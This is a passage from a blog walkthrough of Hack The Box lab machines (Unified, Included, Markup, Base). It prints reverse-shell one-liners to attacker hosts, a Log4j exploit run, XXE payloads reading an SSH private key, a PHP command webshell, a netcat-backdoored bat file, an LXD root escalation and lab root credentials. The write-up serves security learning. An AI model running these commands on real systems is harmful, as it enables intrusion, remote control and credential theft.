<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap <span class="nt">-u</span> <span class="s2">"http://10.129.240.220/dashboard.php?search=TEST"</span> <span class="nt">-p</span> search <span class="nt">--cookie</span><span class="o">=</span><span class="s2">"PHPSESSID=08jropenaav85qjqtedet0aunl"</span>
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109185920.png" text-align="center" />
</div>

<p>So we trigger a os shell by:</p>

<pre><code class="language-bsah">sqlmap -u "http://10.129.240.220/dashboard.php?search=TEST" -p search --cookie="PHPSESSID=08jropenaav85qjqtedet0aunl" --os-shell
</code></pre>

<p>And then we introduce:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash <span class="nt">-c</span> <span class="s2">"bash -i &gt;&amp; /dev/tcp/&lt;LOCALIP&gt;/&lt;PORT&gt; 0&gt;&amp;1"</span>
</code></pre></div></div>

<p>To get a formal shell.</p>

<p>Then we try to enumerate the contents of the machine to discover something interesant. Finally on /var/www/html/dashboard.php we found some credentials that may let us run some sudo commands in order to levereage privileges:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109191011.png" text-align="center" />
</div>

<p>We see that we can run vi with root privileges but restricted to a file:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109191122.png" text-align="center" />
</div>

<p>So we run:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /bin/vi /etc/postgresql/11/main/pg_hba.conf
</code></pre></div></div>

<p>To open the vi editor and then execute a shell:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109191546.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221109191604.png" text-align="center" />
</div>

<p><br /></p>

<h3 id="4-unified-cve-2021-44228-mongodb-enumeration-overwrite-password-hash-mkpasswd-upgrading-terminal">4. Unified (CVE-2021-44228, MongoDB enumeration, overwrite password hash mkpasswd, upgrading terminal)</h3>

<p>In this case we have a machine that have open four ports: 22/tcp SSH, 8080/tcp http-proxy, 8443/tcp, 6789/tcp.</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110164012.png" text-align="center" />
</div>

<p>Doing a more deep scaning on port 8080 we see that we are redirecting to the service hosted on 8443:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110164310.png" text-align="center" />
</div>

<p>And the 8443 service offers some kind of login portal:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110164350.png" text-align="center" />
</div>

<p>Then, we go to the address http://10.129.125.3:8080 and we are redirected to the login portal on 8443 port:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110164613.png" text-align="center" />
</div>

<p>Attending to the version of the portal login: 6.4.54, we can attemp to find a exploit: https://github.com/puzzlepeaches/Log4jUnifi and https://github.com/veracode-research/rogue-jndi to download the ‘rogue-jndi’ directory.</p>

<p>Then we follow the instructions of the README.md file (after we downloaded both repositories and moved the rogue-jndi directory into the Log4Unifi/utils directory) and we need to ensure that we have Java Kit Development and the Maven (mvn) utility for Ubuntu/Debian bouth available through the APT.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>openjdk-11-jdk <span class="nt">-y</span>
</code></pre></div></div>

<p><br /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt-get <span class="nb">install </span>maven
</code></pre></div></div>

<p>Installed in our system.</p>

<p>This exploit will spawn for us a shell into the system by exploiting a POST-JSON-parameter; ‘remember’ that is vulnerable to SSRF. Through this parameter, the server is forced to do a connection to our machine and download a malicious java file that is processed and trigger a revershell. Fortunately, the exploit will automated the process instead of doing us manually.</p>

<p>After doing the above, we simply build the .jar file with the following command on the Log4jUnifi directory:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mvn package <span class="nt">-f</span> utils/rogue-jndi
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110180252.png" text-align="center" />
</div>

<p>Then setup a netcat listener and run the exploit with the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 exploit.py <span class="nt">-u</span> https://&lt;IP&gt;:8443 <span class="nt">-i</span> &lt;LOCAL-TUN0-IP&gt; <span class="nt">-p</span> &lt;LocalPORT&gt;
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110180608.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110180622.png" text-align="center" />
</div>

<p>Next, we upgrade the terminal using the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>script /dev/null <span class="nt">-c</span> bash
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110182342.png" text-align="center" />
</div>

<p>Then, we are looking for credentials. Reviewing the process running on the system, we see that exists an internal service of MongoDB (MongoDB is a source-available cross-platform document-oriented database program. Classified as a NoSQL database program, MongoDB uses JSON-like documents with optional schemas.) listening on the port 27117:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110183116.png" text-align="center" />
</div>

<p>We attemp to connect to the service with the cli-utility <em>mongo</em>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mongo <span class="nt">-host</span> localhost <span class="nt">-port</span> 27117
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110184442.png" text-align="center" />
</div>

<p>Exploring the database we found some credentials:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110184928.png" text-align="center" />
</div>

<p>Then to access the ‘admin’ item we use the following command:</p>

<pre><code class="language-mongo">db.&lt;ITEM&gt;.find().pretty()
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110185115.png" text-align="center" />
</div>

<p>We try to crack this password but we not succed but, as we are in a database and we are facing original data, we can attemp to update the password of the admin user of the web changing the hash.</p>

<p>First, we can see that the hash is SHA-256 following the JohnTheRipper indications:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110191540.png" text-align="center" />
</div>

<p>Then we make a SHA-512 hash with the <em>mkpasswd</em> utility:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mkpasswd <span class="nt">-m</span> sha-512 Password1234

<span class="nv">$6$S</span>.xdEt0jtZtUv4CJ<span class="nv">$7XlBe63J196QRX0XL5P</span>.eYVmtaYT5XUunM3Zur9l7H2tSx91u.BAhwgUaCApX7kMFkO1AXXfzo1IBmYyPU0cF0
</code></pre></div></div>

<p>And then we use the following mongo sentence on the ‘ace’ database:</p>

<pre><code class="language-mongo">db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$S.xdEt0jtZtUv4CJ$7XlBe63J196QRX0XL5P.eYVmtaYT5XUunM3Zur9l7H2tSx91u.BAhwgUaCApX7kMFkO1AXXfzo1IBmYyPU0cF0"}})
</code></pre>

<p>And we can see that the password has been overwrited:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110192144.png" text-align="center" />
</div>

<p>Thus, we go to the login page and try the credentials “administrator:Password1234”, and we get access to the page:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110192943.png" text-align="center" />
</div>

<p>Exploring the web we find root credentials of the server:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221110193306.png" text-align="center" />
</div>

<p>root:NotACrackablePassword4U2022</p>

<p>And thus we gain acces as root over the serve with SSH.</p>

<p><br /></p>

<h3 id="5-included-udp-scan-file-inclusion-tftp-php-reverse-shell-htpasswd-lateral-privilege-escalation-lxd-privilege-escalation">5. Included. (UDP Scan, File Inclusion, TFTP, PHP-reverse-shell, .htpasswd Lateral Privilege escalation, LXD Privilege Escalation.)</h3>

<p>We have in this case we have a machine that is hosting two services:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111093443.png" text-align="center" />
</div>

<p>One is a HTTP server which host a web vulnerable to LFI (Local File Inclusion).</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111093630.png" text-align="center" />
</div>

<p>The second one is a tftp server on 69/udp. TFTP is the acronym of Trivial File Transfer Program and is a server that allow users to upload/download files between machines.</p>

<p>If we search, the directory by default where the files are stored is: /var/lib/tftpboot/</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111095329.png" text-align="center" />
</div>

<p>And, Wappalyzer tell us that the web server is PHP-based</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111101305.png" text-align="center" />
</div>

<p>Thus, since TFTP works by default without the need for authentication. (That means that anyone can connect to the TFTP server and upload or download files from the remote system). we can trigger a reverse-shell by storing a php malicious file with <em>tftp</em> and execute it with the LFI vulnerability.</p>

<p>We can download a php-reverse-shell file through <a href="https://github.com/pentestmonkey/php-reverse-shell">here</a>. Then, we use the <em>tftp</em> cli-utility available through de APT to put the file onto the machine:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111095924.png" text-align="center" />
</div>

<p>Next we set up a Netcat listener on the correct port and we go to the file through the LFI vulnerability:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111100218.png" text-align="center" />
</div>

<p>Next, we upgrade our terminal with:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>script /dev/null <span class="nt">-c</span> bash
</code></pre></div></div>

<p>Enumerating the web server folder /var/www/html we found some credentials:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111100840.png" text-align="center" />
</div>

<p>So we move laterally to other user.</p>

<p>When we try to see the id of this user we realize that the user belongs to a ‘lxd’ group. And that indeed exists a lxd binary:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111102141.png" text-align="center" />
</div>

<p>Searching for information we see that: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.</p>

<p>And: A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.</p>

<p>We can find, step by step the explotation process of this service in the <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation">HackTricks book</a></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>su

<span class="c">#Install requirements</span>

<span class="nb">sudo </span>apt update

<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> git golang-go debootstrap rsync gpg squashfs-tools

<span class="c">#Clone repo</span>

git clone https://github.com/lxc/distrobuilder

<span class="c">#Make distrobuilder</span>

<span class="nb">cd </span>distrobuilder

make

<span class="c">#Prepare the creation of alpine</span>

<span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$HOME</span>/ContainerImages/alpine/

<span class="nb">cd</span> <span class="nv">$HOME</span>/ContainerImages/alpine/

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

<span class="c">#Create the container</span>

<span class="nb">sudo</span> <span class="nv">$HOME</span>/go/bin/distrobuilder build-lxd alpine.yaml <span class="nt">-o</span> image.release<span class="o">=</span>3.8
</code></pre></div></div>

<p>We follow the initially instructions until the files lxd.tar.xz and rootfs.squashfs are created:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111104010.png" text-align="center" />
</div>

<p>Then we upload both images to the server. First we initiate a Python http server in our machine and download from the victim machine with curl:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111104924.png" text-align="center" />
</div>

<p>Then we import both files onto the server with the commands:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>lxc image import lxd.tar.xz rootfs.squashfs <span class="nt">--alias</span> alpine
lxc image list
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111105217.png" text-align="center" />
</div>

<p>Then we run:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>lxc init alpine privesc <span class="nt">-c</span> security.privileged<span class="o">=</span><span class="nb">true
</span>lxc config device add privesc host-root disk <span class="nb">source</span><span class="o">=</span>/ <span class="nv">path</span><span class="o">=</span>/mnt/root <span class="nv">recursive</span><span class="o">=</span><span class="nb">true
</span>lxc start privesc
lxc <span class="nb">exec </span>privesc /bin/sh
</code></pre></div></div>

<p>And then:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221111105658.png" text-align="center" />
</div>

<p><br /></p>

<h3 id="6-markup-weak-password-xmli-windows-ssh-retreive-bat-file-icacls">6. Markup (Weak password, XMLi, Windows SSH retreive, Bat file, icacls).</h3>

<p>In this case we are in front of a machine that is hosting SSH and HTTP/S service on default ports 22, 80 443.</p>

<p>We start by exploring the web. Wappalyzer tell us that the server is Apache, the OS is Microsoft Windows and that the web-server is PHP-based:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112102923.png" text-align="center" />
</div>

<p>Then, we try to map the web but we don’t find anything useful beyond the thing that are alrready visible on the home page. In it, we found an order file that contains severals parameters that accept input from the user. When we attemp to see the request with BurpSuite, we found that there is XML code embebed on the request and it can be vulnerable to XML injection.</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112105511.png" text-align="center" />
</div>

<p>The XMLi or XML External Entity attack, following the <a href="https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing">OWASP’s definition</a> “is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser”. Usually, it is used to read files from the server but it can lead trough several types of attacks:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112110125.png" text-align="center" />
</div>

<p>To find out if we are in front of a vulnerable XML parser we are going to test the request. First, we send it to the BurpRepeater and include a <a href="https://github.com/payloadbox/xxe-injection-payload-list">test payload</a> to see if we can retrieve the contents of a file from the server. Since this is a Windos OS machine we can attemp to retrieve: c:\windows\system32\drivers\etc\hosts</p>

<p>Finally we see that the <em>&lt;item&gt;</em> parameter is vulnerable and bring back the out of the file:</p>

<pre><code class="language-XML">&lt;?xml version = "1.0"?&gt;
&lt;!DOCTYPE root [&lt;!ENTITY ent SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"&gt; ]&gt;
&lt;order&gt;
&lt;quantity&gt;
TESTA
&lt;/quantity&gt;
&lt;item&gt;
&amp;ent;
&lt;/item&gt;
&lt;address&gt;
TESTB
&lt;/address&gt;
&lt;/order&gt;
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112122347.png" text-align="center" />
</div>

<p>Then, exploring more in deep the web we found a comment in which appear to be an username:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112122800.png" text-align="center" />
</div>

<p>Since the machine host a SSH service, we can attemp to retrieve the contents of a SSH key of the user Daniel:</p>

<pre><code class="language-XML">&lt;?xml version = "1.0"?&gt;
&lt;!DOCTYPE root [&lt;!ENTITY ent SYSTEM "file:///c:/Users/daniel/.ssh/id_rsa"&gt; ]&gt;
&lt;order&gt;
&lt;quantity&gt;
TESTA
&lt;/quantity&gt;
&lt;item&gt;
&amp;ent;
&lt;/item&gt;
&lt;address&gt;
TESTB
&lt;/address&gt;
&lt;/order&gt;
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112123145.png" text-align="center" />
</div>

<p>Thus, we copy since “—–BEGIN…” to “END OPENSSH PRIVATE KEY—–” and move it to a file and we call it “id_rsa” and then we give it the 400 perm with chmod and we log with the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-i</span> id_rsa daniel@&lt;IP&gt;
</code></pre></div></div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112124103.png" text-align="center" />
</div>

<p>Next stage is the PrivEsc. First, we check the privileges of our user with ‘whoami /priv’:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112125843.png" text-align="center" />
</div>

<p>Seeing as the privileges listed for the daniel user are not of very unique importance, we can move on to exploring the file system in hopes of discovering any uncommon files or folders that we could use to leverage our attack.</p>

<p>In the C:\Log-Management exists a .bat file. On Windows 10, a batch file typically has a <em>“.bat”</em> extension, and it is a special text file that contains one or multiple commands that run in sequence to perform various actions with Command Prompt.</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112132135.png" text-align="center" />
</div>

<p>The contents show that the bat file clear the logs and exec the “wevtutil.exe” and it only can be run by administrator:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112132338.png" text-align="center" />
</div>

<p>With ‘icacls’ we can check the permissions of the file:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112133028.png" text-align="center" />
</div>

<p>The users of the BUILTIN\Users have the perm ‘F’, this means; full control over the file. This group represents the local users which includes Daniel.</p>

<p>Then, we can perfom the following operation. We can download an executable of netcat to the Windows victim machine and modify the bat file to execute a reverse shell.</p>

<p>First, we download the executable through this source:</p>

<pre><code class="language-URI">https://github.com/int0x33/nc.exe/blob/master/nc64.exe
</code></pre>

<p>we use the ‘wget’ command to download it to our Local Machine because the victim machine doesn’t have access to the internet. Then we setup a python http.server and use the following command on the Victim Machine:</p>

<pre><code class="language-cmd">powershell "Invoke-WebRequest -Uri http://10.10.16.152:8000/nc.exe -OutFile nc.exe"
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112134911.png" text-align="center" />
</div>

<p><br /></p>

<p>And then, we overwrite the job.bat file to write a Revershell:</p>

<pre><code class="language-cmd">echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.152 4444 &gt; C:\Log-Management\job.bat
</code></pre>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112135323.png" text-align="center" />
</div>

<p>Then, we setup a netcat listener and when the script get executed we will escalate privilege to root.</p>

<p><br /></p>

<h3 id="7-base-swap-files-php-insecure-strcmp-autentication-type-juggling-bugs-webshell">7. Base (Swap files, PHP Insecure strcmp autentication {Type Juggling bugs}, webshell)</h3>

<p>In this case we have a machine that is hosting SSH and HTTP services on defaults ports:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112172228.png" text-align="center" />
</div>

<p>Exploring the web we see that wappalyzer refers that the server is Apache 2.4.29 and is PHP-based:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112172309.png" text-align="center" />
</div>

<p>Exploring manually we have a login page in a /login directory that is configured to be listed:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112172348.png" text-align="center" />
</div>

<p><br /></p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112172409.png" text-align="center" />
</div>

<p>And we found a .swp (swap) file. This are recovery files for save the work of a developer when a text-editor like vi crash for some reason. If we download the file and try to open with ‘cat’ or ‘vi’ we will find that it is partialy readable because is in part a binary so we use the ‘strings’ utility to pass the binary part to readable:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strings login.php.swp | <span class="nb">tac</span>
</code></pre></div></div>

<p>We pass the output through ‘tac’ (that do the same that cat but inverse) because the code is printed in inverse order:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112172859.png" text-align="center" />
</div>

<p>This file checks the username/password combination that the user submits against the variables that are stored in the config file (which is potentially communicating with a database) to see if they match.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="nb">strcmp</span><span class="p">(</span><span class="nv">$username</span> <span class="p">,</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strcmp</span><span class="p">(</span><span class="nv">$password</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
</code></pre></div></div>

<p>The developer is using the strcmp function to check the username and password combination. This function is used for string comparison and returns 0 when the two inputted values are identical. However, f strcmp is given an empty array to compare against the stored password, it will return NULL . In PHP the == operator only checks the value of a variable for equality, and the value of NULL is equal to 0 . The correct way to write this would be with the === operator which checks both value and type.</p>

<p>Thus, if we manage to pass to the ‘strcmp()’ function an array we will log-in the web-server.</p>

<p>Fortunately, in PHP, variables can be easily converted into arrays if we add [] in front of them. So we send a log request and intercep it with burp and change the parameter to convert it to an array type:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112173334.png" text-align="center" />
</div>

<p>Thus, we logged and access toth the /upload.php file.</p>

<p>Because the web-server is php-based we can try to upload a <a href="https://github.com/pentestmonkey/php-reverse-shell">php-reverse-shell</a> and access it in /_uploaded/php-reverse-shell.php:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112173700.png" text-align="center" />
</div>

<p>This can be confirmed employing the following php-script:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"&lt;?php phpinfo();"</span> <span class="o">&gt;</span> phpinfo.php
</code></pre></div></div>

<p>And upload it to the web and access it we have the info of the php version, confirm the code execution:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112174207.png" text-align="center" />
</div>

<p>Then we could use ‘system()’ function to execute a webshell:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"&lt;?php echo system(</span><span class="nv">$_REQUEST</span><span class="s2">['cmd']);?&gt;"</span> <span class="o">&gt;</span> shell.php
</code></pre></div></div>

<p>This code will execute as OS command the value of the request parameter, CMD. Then, we do precisely this and introduce the payload:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/bin/bash <span class="nt">-c</span> <span class="s1">'bash -i &gt;&amp; /dev/tcp/&lt;LOCALIP&gt;/&lt;PORT&gt; 0&gt;&amp;1'</span>
</code></pre></div></div>

<p>To create a reverse shell through a socket connection. We upgrade the shell with ‘script /dev/null -c bash’:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112180518.png" text-align="center" />
</div>

<p>In the config.php file we found some credentials and in the /home directory we found the ‘john’ directory, then, we try to log-in as john with the password. john:thisisagoodpassword</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112180640.png" text-align="center" />
</div>

<p>Then we find that ‘john’ can run as root the ‘find’ command:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112181001.png" text-align="center" />
</div>

<p>Then, we go to <a href="">GTFOBins</a>(https://gtfobins.github.io/gtfobins/find/) and apply the exploit on the sudo section:</p>

<div style="text-align:center">
	<img src="/assets/img/HTB/Pasted%20image%2020221112181039.png" text-align="center" />
</div>

<p>And we elevate privilege:</p>


      </article>

      
        <div class="blog-tags">
          <span>Tags:</span>
          
            <a href="/tags#hack">hack</a>
          
        </div>
      

      

      
        <!-- Check if any share-links are active -->




<section id = "social-share-section">
  <span class="sr-only">Share: </span>

  
    <a href="https://twitter.com/intent/tweet?text=Tier+II&url=http%3A%2F%2Flocalhost%3A4000%2F2022-11-11-Tier_2%2F"
      class="btn btn-social-icon btn-twitter" title="Share on Twitter">
      <span class="fab fa-fw fa-twitter" aria-hidden="true"></span>
      <span class="sr-only">Twitter</span>
    </a>
  

  
    <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2F2022-11-11-Tier_2%2F"
      class="btn btn-social-icon btn-facebook" title="Share on Facebook">
      <span class="fab fa-fw fa-facebook" aria-hidden="true"></span>
      <span class="sr-only">Facebook</span>
    </a>
  

  
    <a href="https://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Flocalhost%3A4000%2F2022-11-11-Tier_2%2F"
      class="btn btn-social-icon btn-linkedin" title="Share on LinkedIn">
      <span class="fab fa-fw fa-linkedin" aria-hidden="true"></span>
      <span class="sr-only">LinkedIn</span>
    </a>
  

  

  

</section>



      

      <ul class="pagination blog-pager">
        
        <li class="page-item previous">
          <a class="page-link" href="/2022-11-10-Tier_1/" data-toggle="tooltip" data-placement="top" title="Tier I">&larr; Previous Post</a>
        </li>
        
        
        <li class="page-item next">
          <a class="page-link" href="/2022-11-17-GitBasics/" data-toggle="tooltip" data-placement="top" title="Git Basics">Next Post &rarr;</a>
        </li>
        
      </ul>
      
  
  
  

  


  



    </div>
  </div>
</div>


  <footer>
  <div class="container-md beautiful-jekyll-footer">
    <div class="row">
      <div class="col-xl-8 offset-xl-2 col-lg-10 offset-lg-1">
      <ul class="list-inline text-center footer-links"><li class="list-inline-item">
    <a href="/feed.xml" title="RSS">
      <span class="fa-stack fa-lg" aria-hidden="true">
        <i class="fas fa-circle fa-stack-2x"></i>
        <i class="fas fa-rss fa-stack-1x fa-inverse"></i>
      </span>
      <span class="sr-only">RSS</span>
    </a>
  </li><li class="list-inline-item">
    <a href="mailto:sanmillan.german@gmail.com" title="Email me">
      <span class="fa-stack fa-lg" aria-hidden="true">
        <i class="fas fa-circle fa-stack-2x"></i>
        <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
      </span>
      <span class="sr-only">Email me</span>
   </a>
  </li><li class="list-inline-item">
    <a href="https://github.com/Qv1nTv5" title="GitHub">
      <span class="fa-stack fa-lg" aria-hidden="true">
        <i class="fas fa-circle fa-stack-2x"></i>
        <i class="fab fa-github fa-stack-1x fa-inverse"></i>
      </span>
      <span class="sr-only">GitHub</span>
   </a>
  </li><li class="list-inline-item">
    <a href="https://twitter.com/Qvintvs1" title="Twitter">
      <span class="fa-stack fa-lg" aria-hidden="true">
        <i class="fas fa-circle fa-stack-2x"></i>
        <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
      </span>
      <span class="sr-only">Twitter</span>
   </a>
  </li><li class="list-inline-item">
    <a href="https://linkedin.com/in/german-sanmillan-68b308229/" title="LinkedIn">
      <span class="fa-stack fa-lg" aria-hidden="true">
        <i class="fas fa-circle fa-stack-2x"></i>
        <i class="fab fa-linkedin fa-stack-1x fa-inverse"></i>
      </span>
      <span class="sr-only">LinkedIn</span>
   </a>
  </li></ul>

      
      <p class="copyright text-muted">
      
        Qv1nTv5
        &nbsp;&bull;&nbsp;
      
      2023

      

      
      </p>
      <p class="theme-by text-muted">
        Powered by
        <a href="https://beautifuljekyll.com">Beautiful Jekyll</a>
      </p>
      </div>
    </div>
  </div>
</footer>


  
  
    
  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha256-4+XzXVhsDmqanXGHaHvgh1gMQKX40OUvDEBTu8JcmNs=" crossorigin="anonymous"></script>


  
    
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>


  
    
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>


  



  
    <!-- doing something a bit funky here because I want to be careful not to include JQuery twice! -->
    
      <script src="/assets/js/beautifuljekyll.js"></script>
    
  









</body>
</html>
